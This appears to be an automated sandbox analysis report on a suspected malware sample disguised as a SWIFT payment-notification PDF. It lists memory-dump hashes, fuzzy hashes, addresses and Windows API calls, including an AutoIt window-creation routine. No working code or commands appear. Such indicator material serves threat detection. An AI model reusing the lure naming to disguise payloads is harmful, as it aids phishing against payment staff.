                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: h?C
                                                                                                                              • API String ID: 0-244218268
                                                                                                                              • Opcode ID: 263699aeed138e65ea62b43b4f045f44a857ce7ded7795ced79133f4b88d6354
                                                                                                                              • Instruction ID: e2c8e7dedb99e7930515266a35cf7eaa7a2497e7ebd96f91aa306b63734f8a51
                                                                                                                              • Opcode Fuzzy Hash: 263699aeed138e65ea62b43b4f045f44a857ce7ded7795ced79133f4b88d6354
                                                                                                                              • Instruction Fuzzy Hash: 16619971920116DB8F38AF19C8415EF76E1EB94317B25823BF81892390E6B99FC1C78D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: N@
                                                                                                                              • API String ID: 0-1509896676
                                                                                                                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$FileSystem
                                                                                                                              • String ID: @uJ
                                                                                                                              • API String ID: 2086374402-1268412911
                                                                                                                              • Opcode ID: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                              • Instruction ID: d38707ff02ce459d0d249ce09c4ef886a5fe37698b82f7f0427e65daa233e585
                                                                                                                              • Opcode Fuzzy Hash: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                              • Instruction Fuzzy Hash: CB21A2335605108BF320CF37CC01652B7E7EBE5310F358A69E4A5973D1DAB96906CB98
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                              • Instruction ID: 15a88e8b99aa9b3b60ae860545546d836dfae57515e83b1227ad377bd0fa8ebd
                                                                                                                              • Opcode Fuzzy Hash: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                              • Instruction Fuzzy Hash: 7F327A71D022198BDF24DFA8C4442EEB7B1FF48315F64812BD816AB384D77889D6CB4A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                              • Instruction ID: 686ba6e61829bfb5abb72d2d432ff8bdc6c7a847d080576bad96759afb44e414
                                                                                                                              • Opcode Fuzzy Hash: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                              • Instruction Fuzzy Hash: 7922AD31E04269CBCF24CFA9E4443EEB7B1FB54301FA4816BE452AB284D73C4986CB19
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                              • Instruction ID: 44b7915538c551888a86dac3e56f37fa477da10fc21367d4c66a1e105d7851d0
                                                                                                                              • Opcode Fuzzy Hash: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                              • Instruction Fuzzy Hash: 9A029033D497B24B8B710FF944D02B77EA05E0179031F46AADEC07F2A6C21AED5696E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                              • Instruction ID: 1be110723fa64262e89d0aec0a1a20255c1bae91910aebb39a61821022ff9223
                                                                                                                              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                              • Instruction Fuzzy Hash: 55B1B533D0A6B3058736836D05582BFFE626E91B8031FC396CDD03F399C62AAD9295D4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                              • Instruction ID: 63cd65c8116d56988dc1b5ae21406435ac1d645c4c1b3f8f7c3eaa189ec97cf7
                                                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                              • Instruction Fuzzy Hash: DB41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                              • Instruction ID: bf450152d99aa0a8cd291c4fa7b1d8dc3acce81dbfbc18844f32a16232c4b609
                                                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                              • Instruction Fuzzy Hash: D8018078A10209EFCB48DFA8C6909AEF7B5FB48210F208599DC19A7301D734AE51DB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                              • Instruction ID: b7a6d6880bb3e9805c296b6f19a0f0d8a38f30e28d7d9d7622af0c01ab522f78
                                                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                              • Instruction Fuzzy Hash: 65018078A00209EFCB48DFA8C6909AEF7B5FB48210F208599EC19A7301D734AE51DB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                              • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                              • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                              • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                              • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock
                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                              • API String ID: 1538203242-2373415609
